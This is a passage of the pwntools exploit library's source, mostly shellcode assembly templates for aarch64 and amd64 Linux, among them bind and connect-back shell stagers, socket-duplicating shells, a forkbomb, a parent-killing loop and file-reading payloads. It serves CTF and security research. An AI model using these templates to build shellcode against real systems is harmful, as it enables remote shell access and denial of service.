-------------------------------------------------------------------------------- 1 | import tempfile 2 | 3 | from pathlib import * 4 | 5 | @classmethod 6 | def mktemp(cls): 7 | return cls(tempfile.mktemp()) 8 | 9 | @classmethod 10 | def mkdtemp(cls): 11 | return cls(tempfile.mkdtemp()) 12 | 13 | Path.mktemp = mktemp 14 | Path.mkdtemp = mkdtemp 15 | -------------------------------------------------------------------------------- /pwnlib/flag/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import 2 | 3 | from pwnlib.flag.flag import submit_flag 4 | 5 | __all__ = [ 6 | 'submit_flag', 7 | ] 8 | -------------------------------------------------------------------------------- /pwnlib/gdb_faketerminal.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from pwnlib.tubes.process import process 3 | from time import sleep 4 | from sys import argv 5 | from os import environ 6 | sleep(1) 7 | if len(argv) == 2: 8 | sh = process(argv[1], shell=True, timeout=30) 9 | else: 10 | sh = process(argv[1:], timeout=30) 11 | sh.sendline('set prompt (gdb)') 12 | if environ.get('GDB_FAKETERMINAL') == '0': 13 | sh.sendline('set pagination off') 14 | sh.recvall() 15 | else: 16 | res = sh.sendlineafter('(gdb)', 'c') 17 | while res and b'The program is not being run.' not in res: 18 | res = sh.sendlineafter('(gdb)', 'c') 19 | sh.close() 20 | -------------------------------------------------------------------------------- /pwnlib/internal/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/internal/__init__.py -------------------------------------------------------------------------------- /pwnlib/protocols/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/protocols/__init__.py -------------------------------------------------------------------------------- /pwnlib/replacements.py: -------------------------------------------------------------------------------- 1 | """Improved replacements for standard functions 2 | """ 3 | 4 | import time as __time 5 | 6 | 7 | def sleep(n): 8 | """sleep(n) 9 | 10 | Replacement for :func:`time.sleep()`, which does not return if a signal is received. 11 | 12 | Arguments: 13 | n (int): Number of seconds to sleep. 14 | """ 15 | end = __time.time() + n 16 | while True: 17 | left = end - __time.time() 18 | if left <= 0: 19 | break 20 | __time.sleep(left) 21 | -------------------------------------------------------------------------------- /pwnlib/rop/__init__.py: -------------------------------------------------------------------------------- 1 | from pwnlib.rop.rop import ROP 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/__doc__: -------------------------------------------------------------------------------- 1 | The shellcode module. 2 | 3 | This module contains functions for generating shellcode. 4 | 5 | It is organized first by architecture and then by operating system. 6 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/__doc__: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/shellcraft/templates/aarch64/__doc__ -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/android: -------------------------------------------------------------------------------- 1 | linux -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/breakpoint.asm: -------------------------------------------------------------------------------- 1 | <% import pwnlib.shellcraft as S %> 2 | <%docstring> 3 | Inserts a debugger breakpoint (raises SIGTRAP). 4 | 5 | Example: 6 | 7 | >>> run_assembly(shellcraft.breakpoint()).poll(True) 8 | -5 9 | 10 | brk #0 11 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/crash.asm: -------------------------------------------------------------------------------- 1 | <% import pwnlib.shellcraft as S %> 2 | <%docstring> 3 | Crashes the process. 4 | 5 | Example: 6 | 7 | >>> run_assembly(shellcraft.crash()).poll(True) 8 | -11 9 | 10 | ${S.mov('x30', 0)} 11 | ret 12 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/darwin/__doc__: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/shellcraft/templates/aarch64/darwin/__doc__ -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/darwin/open.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib import shellcraft 3 | %> 4 | <%page args="filename, flags='O_RDONLY', mode='x3'"/> 5 | <%docstring> 6 | Opens a file 7 | 8 | ${shellcraft.pushstr(filename)} 9 | ${shellcraft.syscall('SYS_open', 'sp', flags, mode)} 10 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/darwin/syscalls/__doc__: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/shellcraft/templates/aarch64/darwin/syscalls/__doc__ -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/freebsd/__doc__: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/shellcraft/templates/aarch64/freebsd/__doc__ -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/infloop.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <%docstring> 3 | An infinite loop. 4 | 5 | Example: 6 | 7 | >>> io = run_assembly(shellcraft.infloop()) 8 | >>> io.recvall(timeout=1) 9 | b'' 10 | >>> io.close() 11 | 12 | 13 | <% infloop = common.label("infloop") %> 14 | ${infloop}: 15 | b ${infloop} 16 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/linux/__doc__: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/shellcraft/templates/aarch64/linux/__doc__ -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/linux/cat.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib import shellcraft 3 | %> 4 | <%page args="filename, fd=1"/> 5 | <%docstring> 6 | Opens a file and writes its contents to the specified file descriptor. 7 | 8 | Example: 9 | 10 | >>> f = tempfile.mktemp() 11 | >>> write(f, 'This is the flag\n') 12 | >>> shellcode = shellcraft.cat(f) + shellcraft.exit(0) 13 | >>> run_assembly(shellcode).recvline() 14 | b'This is the flag\n' 15 | 16 | <% 17 | if fd == 'x0': 18 | raise Exception("File descriptor cannot be x0, it will be overwritten") 19 | %> 20 | ${shellcraft.open(filename)} 21 | ${shellcraft.syscall('SYS_sendfile', fd, 'x0', 0, 0x7fffffff)} 22 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/linux/dupio.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.aarch64 import mov,setregs %> 3 | <%page args="sock = 'x12'"/> 4 | <%docstring> 5 | Args: [sock (imm/reg) = x12] 6 | Duplicates sock to stdin, stdout and stderr 7 | 8 | <% 9 | looplabel = common.label("loop") 10 | %> 11 | /* dup() file descriptor ${sock} into stdin/stdout/stderr */ 12 | ${setregs({'x8': 'SYS_dup3', 'x1': 2, 'x2': 0})} 13 | 14 | ${looplabel}: 15 | ${mov('x0', sock)} 16 | svc #0 17 | subs x1, x1, #1 18 | bpl ${looplabel} 19 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/linux/dupsh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft.aarch64 import linux %> 2 | <%page args="sock = 'x12'"/> 3 | <%docstring> 4 | Args: [sock (imm/reg) = x12] 5 | Duplicates sock to stdin, stdout and stderr and spawns a shell. 6 | 7 | 8 | 9 | ${linux.dupio(sock)} 10 | 11 | ${linux.sh()} 12 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/linux/echo.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import aarch64 %> 2 | <%page args="string, sock = '1'"/> 3 | <%docstring> 4 | Writes a string to a file descriptor 5 | 6 | Example: 7 | 8 | >>> run_assembly(shellcraft.echo('hello\n', 1)).recvline() 9 | b'hello\n' 10 | 11 | 12 | 13 | ${aarch64.pushstr(string, append_null = False)} 14 | ${aarch64.linux.write(sock, 'sp', len(string))} 15 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/linux/forkexit.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft import common 3 | from pwnlib.shellcraft.aarch64.linux import fork, exit 4 | %> 5 | <%page args=""/> 6 | <%docstring> 7 | Attempts to fork. If the fork is successful, the parent exits. 8 | 9 | <% 10 | dont_exit = common.label('forkexit') 11 | %> 12 | ${fork()} 13 | cmp x0, 1 14 | blt ${dont_exit} 15 | ${exit(0)} 16 | ${dont_exit}: 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/linux/kill.asm: -------------------------------------------------------------------------------- 1 | ../../common/linux/kill.asm -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/linux/killparent.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.aarch64.linux import getppid, kill 3 | from pwnlib.shellcraft.common import label 4 | %> 5 | <%docstring> 6 | Kills its parent process until whatever the parent is (probably init) 7 | cannot be killed any longer. 8 | 9 | <% 10 | killparent_loop = label('killparent') 11 | %> 12 | ${killparent_loop}: 13 | ${getppid()} 14 | ${kill('x0')} 15 | cmp x0,x0 16 | beq ${killparent_loop} 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/linux/open.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib import shellcraft 3 | %> 4 | <%page args="filename, flags='O_RDONLY', mode='x3'"/> 5 | <%docstring> 6 | Opens a file 7 | 8 | <% 9 | AT_FDCWD=-100 10 | %> 11 | ${shellcraft.pushstr(filename)} 12 | ${shellcraft.syscall('SYS_openat', AT_FDCWD, 'sp', flags, mode)} 13 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/linux/readn.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.aarch64.linux import read 3 | from pwnlib.shellcraft.aarch64 import setregs 4 | from pwnlib.shellcraft import common 5 | %> 6 | <%page args="fd, buf, nbytes"/> 7 | <%docstring> 8 | Reads exactly nbytes bytes from file descriptor fd into the buffer buf. 9 | 10 | Arguments: 11 | fd(int): fd 12 | buf(void): buf 13 | nbytes(size_t): nbytes 14 | 15 | <% 16 | readn_loop = common.label('readn_loop') 17 | %> 18 | ${setregs({'x3': buf, 'x4': nbytes})} 19 | ${readn_loop}: 20 | ${read(fd, 'x3', 'x4')} 21 | add x3, x3, x0 22 | subs x4, x4, x0 23 | bne ${readn_loop} 24 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/linux/setresuid.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.aarch64 import mov, linux %> 3 | <%page args="ruid=None, euid=None, suid=None"/> 4 | <%docstring> 5 | Args: [ruid = geteuid(), euid = ruid, suid = ruid] 6 | Sets real, effective and saved user ids to given values 7 | 8 | 9 | %if ruid is None: 10 | ${linux.geteuid()} 11 | <% ruid = 'x0' %> 12 | %endif 13 | <% 14 | if euid is None: euid = ruid 15 | if suid is None: suid = ruid 16 | %> 17 | 18 | ${linux.syscalls.setresuid(ruid, euid, suid)} 19 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/linux/sh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib import shellcraft as SC %> 2 | <%docstring> 3 | Execute a different process. 4 | 5 | >>> p = run_assembly(shellcraft.aarch64.linux.sh()) 6 | >>> p.sendline(b'echo Hello') 7 | >>> p.recv() 8 | b'Hello\n' 9 | 10 | 11 | ${SC.pushstr('/bin///sh')} 12 | ${SC.execve('sp', 0, 0)} 13 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/linux/sleep.asm: -------------------------------------------------------------------------------- 1 | ../../common/linux/sleep.asm -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/linux/syscalls: -------------------------------------------------------------------------------- 1 | ../../common/linux/syscalls -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/memcpy.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import aarch64, pretty, common %> 2 | <%docstring>Copies memory. 3 | 4 | Args: 5 | dest: Destination address 6 | src: Source address 7 | n: Number of bytes 8 | 9 | <%page args="dest, src, n"/> 10 | <% 11 | memcpy_loop = common.label("memcpy_loop") 12 | %> 13 | /* memcpy(${pretty(dest)}, ${pretty(src)}, ${pretty(n)}) */ 14 | ${aarch64.setregs({'x0': dest, 'x1': src, 'x2': n})} 15 | ${memcpy_loop}: 16 | ldrb w3, [x1], #1 17 | strb w3, [x0], #1 18 | subs x2, x2, #1 19 | bgt ${memcpy_loop} 20 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/aarch64/trap.asm: -------------------------------------------------------------------------------- 1 | breakpoint.asm -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing generic Intel x86_64 shellcodes. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/android: -------------------------------------------------------------------------------- 1 | linux -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/crash.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft.amd64 import popad %> 2 | <%docstring> 3 | Crash. 4 | 5 | Example: 6 | 7 | >>> run_assembly(shellcraft.crash()).poll(True) 8 | -11 9 | 10 | /* fill all registers with shit */ 11 | ${popad()} 12 | xor rsp, rsp /* especially esp */ 13 | jmp rsp /* boom */ 14 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/darwin/__doc__: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/shellcraft/templates/amd64/darwin/__doc__ -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/darwin/cat.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.amd64 import syscall, pushstr 3 | from pwnlib.shellcraft import common 4 | %> 5 | <%page args="filename, fd=1"/> 6 | <%docstring> 7 | Opens a file and writes its contents to the specified file descriptor. 8 | 9 | <% 10 | raise Exception("not implemented, please use 'cat2'") 11 | %> 12 | ${pushstr(filename)} 13 | ${syscall('SYS_open', 'rsp', 'O_RDONLY', 'rdx')} 14 | /* osx: int sendfile(int fd, int s, off_t offset, off_t *len, struct sf_hdtr *hdtr, int flags); */ 15 | /* linux: ssize_t sendfile(int out_fd, int in_fd, off_t *offset, size_t count); */ 16 | ${syscall('SYS_sendfile', fd, 'rax', 0, 0x7fffffff)} 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/darwin/cat2.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib import shellcraft 3 | %> 4 | <%page args="filename, fd=1, length=0x4000"/> 5 | <%docstring> 6 | Opens a file and writes its contents to the specified file descriptor. 7 | Uses an extra stack buffer and must know the length. 8 | 9 | 10 | ${shellcraft.open(filename)} 11 | ${shellcraft.mov('rdx', length)} 12 | sub rsp, rdx 13 | ${shellcraft.read('rax', 'rsp', 'rdx')} 14 | ${shellcraft.write(fd, 'rsp', 'rax')} 15 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/darwin/open.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib import shellcraft 3 | %> 4 | <%page args="filename, flags='O_RDONLY', mode='rdx'"/> 5 | <%docstring> 6 | Opens a file 7 | 8 | ${shellcraft.pushstr(filename)} 9 | ${shellcraft.syscall('SYS_open', 'rsp', flags, mode)} 10 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/darwin/syscalls/__doc__: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/pwnlib/shellcraft/templates/amd64/darwin/syscalls/__doc__ -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/freebsd/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing Intel x86_64 shellcodes for FreeBSD. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/freebsd/amd64_to_i386.asm: -------------------------------------------------------------------------------- 1 | <%docstring>Returns code to switch from amd64 to i386 mode. Trashes eax, ecx, edx. 2 | 3 | Note that you most surely want to set up some stack (and place this code) 4 | in low address space before (or afterwards). 5 | .code64 6 | call $+4 7 | .byte 0xc0 /* inc eax */ 8 | mov byte ptr [rsp+4], 0x33 /* This is the segment we want to go to */ 9 | retfd 10 | .code32 11 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/infloop.asm: -------------------------------------------------------------------------------- 1 | <%docstring>A two-byte infinite loop. 2 | jmp $ 3 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/__doc__: -------------------------------------------------------------------------------- 1 | Shellcraft module containing Intel x86_64 shellcodes for Linux. 2 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/amd64_to_i386.asm: -------------------------------------------------------------------------------- 1 | <%docstring>Returns code to switch from amd64 to i386 mode. Trashes eax, ecx, edx. 2 | 3 | Note that you most surely want to set up some stack (and place this code) 4 | in low address space before (or afterwards). 5 | .code64 6 | call $+4 7 | .byte 0xc0 /* inc eax */ 8 | mov byte ptr [rsp+4], 0x23 /* This is the segment we want to go to */ 9 | retfd 10 | .code32 11 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/bindsh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft.amd64.linux import listen, dupsh%> 2 | <%page args="port, network='ipv4'"/> 3 | <%docstring> 4 | bindsh(port,network) 5 | 6 | Listens on a TCP port and spawns a shell for the first to connect. 7 | Port is the TCP port to listen on, network is either 'ipv4' or 'ipv6'. 8 | 9 | ${listen(port, network)} 10 | ${dupsh('rax')} 11 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/cat.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.amd64 import syscall, pushstr 3 | from pwnlib.shellcraft import common 4 | %> 5 | <%page args="filename, fd=1"/> 6 | <%docstring> 7 | Opens a file and writes its contents to the specified file descriptor. 8 | 9 | 10 | ${pushstr(filename)} 11 | ${syscall('SYS_open', 'rsp', 'O_RDONLY', 'rdx')} 12 | ${syscall('SYS_sendfile', fd, 'rax', 0, 0x7fffffff)} 13 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/cat2.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.amd64 import syscall, pushstr 3 | from pwnlib.shellcraft import common 4 | %> 5 | <%page args="filename, fd=1, length=0x4000"/> 6 | <%docstring> 7 | Opens a file and writes its contents to the specified file descriptor. 8 | Uses an extra stack buffer and must know the length. 9 | 10 | 11 | ${pushstr(filename)} 12 | ${syscall('SYS_open', 'rsp', 'O_RDONLY', length)} 13 | sub rsp, rdx 14 | ${syscall('SYS_read', 'rax', 'rsp', 'rdx')} 15 | ${syscall('SYS_write', fd, 'rsp', 'rax')} 16 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/connectstager.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.amd64 import linux %> 3 | <%docstring> 4 | connect recvsize stager 5 | Args: 6 | host, where to connect to 7 | port, which port to connect to 8 | network, ipv4 or ipv6? (default: ipv4) 9 | 10 | <%page args="host, port, network = 'ipv4'"/> 11 | 12 | ${linux.connect(host, port, network)} 13 | ${linux.recvsize('rbp', 'rcx')} 14 | ${linux.stager('rdi', 'rcx')} 15 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/dupio.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common, amd64 %> 2 | <%page args="sock = 'rbp'"/> 3 | <%docstring> 4 | Args: [sock (imm/reg) = rbp] 5 | Duplicates sock to stdin, stdout and stderr 6 | 7 | <% 8 | looplabel = common.label("loop") 9 | %> 10 | 11 | /* dup() file descriptor ${sock} into stdin/stdout/stderr */ 12 | ${amd64.setregs({'rdi': sock, 'rsi': 2})} 13 | ${looplabel}: 14 | ${amd64.linux.dup2('rdi', 'rsi')} 15 | dec rsi 16 | jns ${looplabel} 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/dupsh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.amd64 import linux %> 3 | <%page args="sock = 'rbp'"/> 4 | <%docstring> 5 | Args: [sock (imm/reg) = rbp] 6 | Duplicates sock to stdin, stdout and stderr and spawns a shell. 7 | 8 | 9 | 10 | ${linux.dupio(sock)} 11 | 12 | ${linux.sh()} 13 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/echo.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%page args="string, sock = '1'"/> 3 | <%docstring>Writes a string to a file descriptor 4 | 5 | ${amd64.pushstr(string, append_null = False)} 6 | ${amd64.linux.syscall('SYS_write', sock, 'rsp', len(string))} 7 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/findpeersh.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft.amd64 import linux %> 2 | <%page args="port = None"/> 3 | <%docstring> 4 | Args: port (defaults to any) 5 | Finds an open socket which connects to a specified 6 | port, and then opens a dup2 shell on it. 7 | 8 | 9 | 10 | ${linux.findpeer(port)} 11 | 12 | ${linux.dupsh("rdi")} 13 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/findpeerstager.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.amd64 import linux %> 3 | <%docstring> 4 | Findpeer recvsize stager 5 | Args: 6 | port, the port given to findpeer (defaults to any) 7 | 8 | <%page args="port = None"/> 9 | 10 | ${linux.findpeer(port)} 11 | ${linux.recvsize('rdi', 'rcx')} 12 | ${linux.stager('rdi', 'rcx')} 13 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/forkbomb.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.amd64.linux import fork 3 | from pwnlib.shellcraft.common import label 4 | %> 5 | <%docstring> 6 | Performs a forkbomb attack. 7 | 8 | <% 9 | dosloop = label('fork_bomb') 10 | %> 11 | ${dosloop}: 12 | ${fork()} 13 | jmp ${dosloop} 14 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/forkexit.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft import common 3 | from pwnlib.shellcraft.amd64.linux import fork, exit 4 | %> 5 | <%page args=""/> 6 | <%docstring> 7 | Attempts to fork. If the fork is successful, the parent exits. 8 | 9 | <% 10 | dont_exit = common.label('forkexit') 11 | %> 12 | ${fork()} 13 | cmp rax, 1 14 | jl ${dont_exit} 15 | ${exit(0)} 16 | ${dont_exit}: 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/getpid.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%docstring>Retrieve the current PID 3 | 4 | ${amd64.linux.syscall('SYS_getpid')} 5 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/kill.asm: -------------------------------------------------------------------------------- 1 | ../../common/linux/kill.asm -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/killparent.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.amd64.linux import getppid, kill 3 | from pwnlib.shellcraft.common import label 4 | %> 5 | <%docstring> 6 | Kills its parent process until whatever the parent is (probably init) 7 | cannot be killed any longer. 8 | 9 | <% 10 | killparent_loop = label('killparent') 11 | %> 12 | ${killparent_loop}: 13 | ${getppid()} 14 | ${kill('eax')} 15 | test eax, eax 16 | jz ${killparent_loop} 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/migrate_stack.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%page args="size=0x100000, fd=0"/> 3 | <%docstring>Migrates to a new stack. 4 | 5 | ${amd64.linux.mmap_rwx(size)} 6 | ${amd64.mov('rsp', 'rax')} 7 | 8 | add rsp, ${'%#x' % ((size * 3 // 4) & ~7)} 9 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/mmap_rwx.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%page args="size = 0x1000, protection = 7, address = None"/> 3 | <%docstring>Maps some memory 4 | <% 5 | if address: 6 | flags = 'MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED' 7 | else: 8 | flags = 'MAP_PRIVATE | MAP_ANONYMOUS' 9 | %> 10 | ${amd64.linux.mmap(address, size, protection,flags, 0, 0)} 11 | 12 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/read.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%page args="fd=0, buffer='rsp', count=8"/> 3 | <%docstring> 4 | Reads data from the file descriptor into the provided buffer. 5 | This is a one-shot and does not fill the request. 6 | 7 | 8 | ${amd64.linux.syscall('SYS_read', fd, buffer, count)} 9 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/read_upto.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%page args="fd=0, buffer='rsp', sizereg='rdx'"/> 3 | <%docstring>Reads up to N bytes 8 bytes into the specified register 4 | 5 | ${amd64.linux.readptr(sizereg)} 6 | ${amd64.linux.read(fd, buffer, sizereg)} 7 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/readfile.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%page args="path, dst = 'rdi'"/> 3 | <%docstring> 4 | Args: [path, dst (imm/reg) = rdi ] 5 | Opens the specified file path and sends its content to the specified file descriptor. 6 | 7 | /* Save destination */ 8 | ${amd64.mov('r8', dst)} 9 | 10 | ${amd64.pushstr(path)} 11 | 12 | ${amd64.syscall('SYS_open', 'rsp', 'O_RDONLY')} 13 | 14 | /* Save file descriptor for later */ 15 | ${amd64.mov('rbx', 'rax')} 16 | 17 | ${amd64.syscall('SYS_fstat', 'rax', 'rsp')} 18 | 19 | /* Get file size */ 20 | add rsp, 48 21 | mov rdx, [rsp] 22 | 23 | ${amd64.syscall('SYS_sendfile', 'r8', 'rbx', 0, 'rdx')} 24 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/readn.asm: -------------------------------------------------------------------------------- 1 | <% 2 | from pwnlib.shellcraft.amd64.linux import read 3 | from pwnlib.shellcraft.amd64 import setregs 4 | from pwnlib.shellcraft import common 5 | %> 6 | <%page args="fd, buf, nbytes"/> 7 | <%docstring> 8 | Reads exactly nbytes bytes from file descriptor fd into the buffer buf. 9 | 10 | Arguments: 11 | fd(int): fd 12 | buf(void): buf 13 | nbytes(size_t): nbytes 14 | 15 | <% 16 | readn_loop = common.label('readn_loop') 17 | %> 18 | ${setregs({'rsi': buf, 'rdx': nbytes})} 19 | ${readn_loop}: 20 | ${read(fd, 'rsi', 'rdx')} 21 | add rsi, rax 22 | sub rdx, rax 23 | jnz ${readn_loop} 24 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/readptr.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%page args="fd=0, target_reg='rdx'"/> 3 | <%docstring>Reads 8 bytes into the specified register 4 | 5 | push 1 6 | ${amd64.linux.read(fd, 'rsp', 8)} 7 | pop ${target_reg} 8 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/recvsize.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from pwnlib.shellcraft.amd64 import linux %> 3 | <%docstring> 4 | Recives 4 bytes size field 5 | Useful in conjuncion with findpeer and stager 6 | Args: 7 | sock, the socket to read the payload from. 8 | reg, the place to put the size (default ecx). 9 | Leaves socket in ebx 10 | 11 | <%page args="sock, reg='rcx'"/> 12 | <% 13 | recvsize = common.label("recvsize") 14 | %> 15 | ${recvsize}: 16 | xor ${reg}, ${reg} 17 | push ${reg} 18 | ${linux.syscall('SYS_read', sock, 'rsp', 4)} 19 | pop ${reg} 20 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/setregid.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import amd64 %> 2 | <%page args="gid = 'egid'"/> 3 | <%docstring> 4 | Args: [gid (imm/reg) = egid] 5 | Sets the real and effective group id. 6 | 7 | 8 | % if gid == 'egid': 9 | /* getegid */ 10 | ${amd64.linux.syscall('SYS_getegid')} 11 | ${amd64.mov('rdi', 'rax')} 12 | % else: 13 | ${amd64.mov('rdi', gid)} 14 | % endif 15 | 16 | ${amd64.linux.syscall('SYS_setregid', 'rdi', 'rdi')} 17 | -------------------------------------------------------------------------------- /pwnlib/shellcraft/templates/amd64/linux/setresuid.asm: -------------------------------------------------------------------------------- 1 | <% from pwnlib.shellcraft import common %> 2 | <% from 